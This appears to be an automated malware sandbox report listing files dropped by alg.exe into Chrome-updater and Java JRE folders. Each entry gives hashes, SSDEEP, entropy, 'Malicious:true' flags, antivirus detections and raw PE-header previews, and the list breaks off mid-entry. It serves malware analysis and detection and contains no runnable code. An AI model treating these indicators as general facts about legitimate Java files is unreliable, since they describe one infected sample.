                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............Z...Z...Z..[..Z..[L..Z..[..Zu.[.Zu.[..Zu.[..Z..[..Z...Z...Z..[...Z..]Z...Z..5Z...Z..[...ZRich...Z........................PE..L...;..d..........................................@........................... ..............................................5..<....`..p2...........................+..T...........................h+..@............................................text...h........................... ..`.rdata...\.......^..................@..@.data........@.......0..............@....rsrc...p2...`...4...:..............@..@.reloc...p...........n..............@...........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exe

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):105669632
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.999989132196193
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:3145728:GLAKHgDx/oat8qdTsdZDAE1mXXaYS79zDIICU:EBWx/pt8U7E6aZRfIICU
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:26A34F4722D729D7E56B739F718E1EA9
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:7B9C2A6834EC5673B65B20E85E3A6F5E72EE7044
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:ABC7F9354F15F24AA6618C36D11A36C5A45345D0A9D402E3E6DB8A10ECB657E5
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:1F5C66B5B932E64ECF997D285D896EEC6E568B2CF41D02258989900C8020447974684BB64B1D5C165074D7DCE568548FC29B3A2887A48B42D070168CDA2936BE
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e.........."......4...LC................@..............................L.....qJM... ..................................................X..P........+C.....|....................W..............................PP..@............Z...............................text...&2.......4.................. ..`.rdata.......P.......8..............@..@.data...p....p.......N..............@....pdata..|............P..............@..@.00cfg..0............T..............@..@.retplne.............V...................rsrc....+C......,C..X..............@..@.reloc........C.......C.............@...........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1313792
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.573530631056213
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:kqiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:ks/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:8C1FFD4095532716F65C7AAE1348E971
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:4DC38ED9101589D18A0E0277E1D5A34617B1CA66
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:69A7622897352D651C1E6AFA40A07F9C557C11443A2E1A6FB204380A332F8FA8
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:57F4A7227D0190B7300920183028C03C0D275E6996B240A122E0042AC04BD10F660945F369A3CC4BB0BA845278CFC0046ECA6742E95455A636AD22A3DC51BDA5
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........8.C.VWC.VWC.VWJ..WS.VW!.WVA.VW!.SV\.VW!.RVO.VW!.UVB.VWW.WVJ.VWC.WW!.VW.SVB.VW..WB.VW.TVB.VWRichC.VW........PE..L.....d.................8...6.......4.......P....@.................................n\......................................$i.......................................b..T............................a..@............P...............................text....7.......8.................. ..`.rdata...#...P...$...<..............@..@.data...L............`..............@....rsrc................b..............@..@.reloc...`...........l..............@...........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1297920
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.53474441985271
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:oCziJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:NH/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:9886AF92B451FF56FEBD6122ECC43BE1
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:81D75E6E5B7EA8FD7AF75B617ACA9DEE8191CE8C
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:ABC8C1FE5337F34876E705B9C8EBFD88ED76DABD1709FD9263EC8278ABA1F681
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:C113E105477820C830F33512C276224C302023C8998C00D6485A53A0AB83C317987F033B8E8FA9133E86C7D9D4A71B6EFE5CBE7A1331EC79673CF361CBA4ADB3
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.................................?e.......................................&.......@..d...........................h"..T............................!..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0....... ..............@....rsrc...d....@......."..............@..@.reloc...`...P......................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Java\jre-1.8\bin\java.exe

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1530880
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.9995881643655204
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:2cwOtO7a/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:2hOtmaLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:E50288EBDB4FCF0AAFBB02E3F87B9421
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:93635D636B320082D5116828A1F7D596A2AE7269
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:DD2C0578008431BE2D2D9EF599A91CFCED704746615FCE9F4AE85386C5070B26
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:C616F38EFBBC0780F070C9EAED310F6880F9C17E70EE6FA6616FC8ABDB8CCBA80B564843EB41EF6C36B26DC22B87CC893019AD1D37EB90290176D52AE065E5F1
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x..F<...<...<...(..3...(......(......^.F.;...^......^......^..)...(..5...<...N......3.....D.=......=...Rich<...........................PE..L.....d.................N...t....../........`....@..........................P"..... ........................................!..d....P..............................P...T...............................@............`...............................text...\M.......N.................. ..`.rdata..@....`.......R..............@..@.data........0......................@....rsrc........P.......*..............@..@.reloc...p..........................@...........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1368064
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.641328927831816
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:217/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:2VLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:ABD7B864956CA9AF6A50F5873E39A2B1
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:E54B089077515743C79A1CBB38E418BD16DA0866
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:ABF764638EBCA5C3C5B91A8194998F75A4DCF7309CC5B660DADCAD0853FF4216
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:E811EEB3C57FBDEDE8FFB09F21A41E25FD9A9C252FD99F54A9567133E1AADAE9FC9371C922C39B05A8792330771D6E0AA758E22CDE6A2C3B83342E466B2C34E8
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......VT.f.5.5.5.5.5.5.M\5.5.5pM.4.5.5pM.4.5.5pM.4.5.5.^.4.5.5.5.5.5.5pM.455.5.L.4.5.5.L05.5.5.L.4.5.5Rich.5.5........................PE..L.....d.................P...........K.......`....@.........................................................................8...@......................................T...............................@............`...............................text....O.......P.................. ..`.rdata...g...`...h...T..............@..@.data...@...........................@....rsrc...............................@..@.reloc...`...p.......@..............@...........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1530880
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.00028905069821
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:QfU/h/4K5/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:QM/V5LNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:3DF33C0C1F9016958095970C3F143532
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:8BE15B71EE3F0E6591F4F391C4925FEFB9FF526A
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:0E602449CDAD1E51D5AD2D077153FBEE97278F63E64472B4111594F7790EFD81
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:C723131247DB3D4468045E59687ED828C448FBEA182370155ED05A35697BA7DB6D86BAB6475DA76E8F29AFF5AFE7B0B34D2B789142375F95F04516EC15CC2629
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9..#}..p}..p}..pi.qr..pi.q..pi.qo..p..}pz..p..qX..p..qo..p..qh..pi.qt..p}..p...p..qr..p...p|..p..q|..pRich}..p........................PE..L.....d.................N...t......7........`....@..........................P"..............................................!..d....P.............................P...T...............................@............`...............................text....M.......N.................. ..`.rdata..@....`.......R..............@..@.data........0......................@....rsrc.......P.......*..............@..@.reloc...p..........................@...........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1669632
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.07347260341301
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:Ox7NiBLZ05jNTmJWEx2/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:OxZiHIjNg2LNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:F09A0BF69601E9842791A52760524299
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:9CE06359FF44E750E0BB1E13BDCEB1EB6BFE9BD5
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:D85406B900AC2A2595E78A9C58963FF5AA1D1A7A0A98663D5817FD3D761B55FF
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:96C623D7A7D93CB785BE8F3E6F384E9D9FB48F09025A5F5346C5E24F9EC62F13910BF99041A3A4A173FBC223B36C84C1A4F85903F2CEEBCD3C8804393C617E52
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......p...4rv.4rv.4rv. .u.>rv. .s..rv. .r.&rv.V.r.!rv.V.u.,rv.V.s..rv. .w.?rv.4rw..rv..r.&rv..s.0rv....5rv..t.5rv.Rich4rv.................PE..L.....d............................^.............@...........................%.................................................x...................................L...T............................4..@...................,........................text...,........................... ..`.rdata..:(.......*..................@..@.data............t..................@....rsrc................:..............@..@.reloc.......0......................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1297920
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.53517943064627
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:aPrDiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:67/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:E192F0F2975683C9117E7D3DB7FB05A3
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:A0840F1BC822BABA531316D1BF81D458BBA98DE5
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:2CB47CC29955AAAD586A69078965D027FC69CD0F220CC8CDDC75F75304ACBF80
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:E6D50BC204CC4143B7B192FE97F836C09C10335E19304C99136A459BFD10C41EB1573F774E96F93D01AF7367FA3E4972D8A7A7A5323F59430979DDFBCDAA44CB
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.................................4........................................&.......@..H............................"..T............................!..@............ ...............................text............................... ..`.rdata..6.... ......................@..@.data........0....... ..............@....rsrc...H....@......."..............@..@.reloc...`...P......................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1397760
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.700537761612368
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:mdP/g/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:a4LNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:5D58F647D1DBE76260AD9396DA36AB46
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:DEC886690D7BCB8D85AE1883D5ABC5CC80D7A68D
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:0BA6029BA26C01D8C93E56BD15CA44C4657D701F85398575F7186C13070B4F03
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:7C3999A85D8E5E7A4AA1AF84BDD8FD9B9804ADAD996027CE428A2F336D54D5A49B63BE808249BF72D92B00A7DABA8ECFE225ED71E244E415CD5C104F8DC89E47
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<.$x..wx..wx..wq.uwn..wl..vp..w...v}..w...vu..w...v{..wx..w...w...v_..w...vy..w...vs..w...wy..w...vy..wRichx..w........PE..L...}.d..........................................@..........................` ......,..........................................h...................................`v..T............................u..@............................................text............................... ..`.rdata..R...........................@..@.data...P2..........................@....rsrc...............................@..@.reloc...p..........................@...................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1297920
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.535189840630556
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:ga5riJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:1Z/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:E3DFC5096DDF9D2D2CCAC908EFF5D1E4
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:5954CA095F25C9131839D19B66D9F1A7E2DE2CA4
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:1CF14506631E684AB1446E9B4E7B033A83E3150BBD0D40F2807A57C7735A2AA9
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:FA3EF9421408493FCBD2FAF46169BA32B791083BD5FF244BCBF7BF1B9DA4CD6F56FD4C464C86CB7A5693A520B7F7A14E15CC253AF7F752476C0123AA2B7C9BED
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................................................................&.......@..\............................"..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...\....@......."..............@..@.reloc...`...P......................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1297920
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.535262417231299
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:3ylziJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:Cd/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:ABC0BA1CDC933590C5BD98106CE014D3
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:C6E64090946CC3B8FE5B835DEB70A2FBB601FFED
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:2F70AAF7D469BA94CB56528537247821277C0872556942E03387C15203A53077
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:6AC4241DE44B602CBCD8AFBC142C6235075F5687175C81771857285F7350A074A4CB6EBB7CE9A23F4A1D53486BC096403F9A8D9D1BA85D4CF536E2B6327520A3
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................................................................&.......@..T............................"..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...T....@......."..............@..@.reloc...`...P......................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Java\jre-1.8\bin\klist.exe

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1297920
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.535267993913123
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:dKlziJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:Yd/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:71020870815D2FEC8B4DC22075215908
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:0915CDB4E79725890BE43A2E1E8641BF35CE187C
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:D493F6E7BDB0A628C3AF14553E4D58EE37E5F1979CF3A393D4E647B3962A8AF6
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:620028B182BFA8E2D72E9DE0CAC64CF879DC4D84221DB7B443C4F61AB4772CE9B658C59DD3A2EAF6C84B7CD36A7279553A4D780BA53F65B720514C098D263715
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................................................................&.......@..T............................"..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...T....@......."..............@..@.reloc...`...P......................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exe

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1297920
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.53524122570053
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:V7mTiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:pe/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:D942A55C47A464958F8C79AD7BC497B6
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:F46CDD6237D58821967D505624745C9C8A31057B
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:782F441E141901E13965571DD32BDD05FBA09B5E8AF9314CD28629BA430A590E
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:493BDAA369B752A8A102C9E32C966BFA13070BC729AB9ED091FD03A2A2636AAD229F695BE1C6441018BB407ED2FA68B2BBE29D451BD7B027A0237EFDEA21A418
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.........................................................................&.......@..P............................"..T............................!..@............ ...............................text............................... ..`.rdata..6.... ......................@..@.data........0....... ..............@....rsrc...P....@......."..............@..@.reloc...`...P......................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exe

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1297920
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.5360817651182375
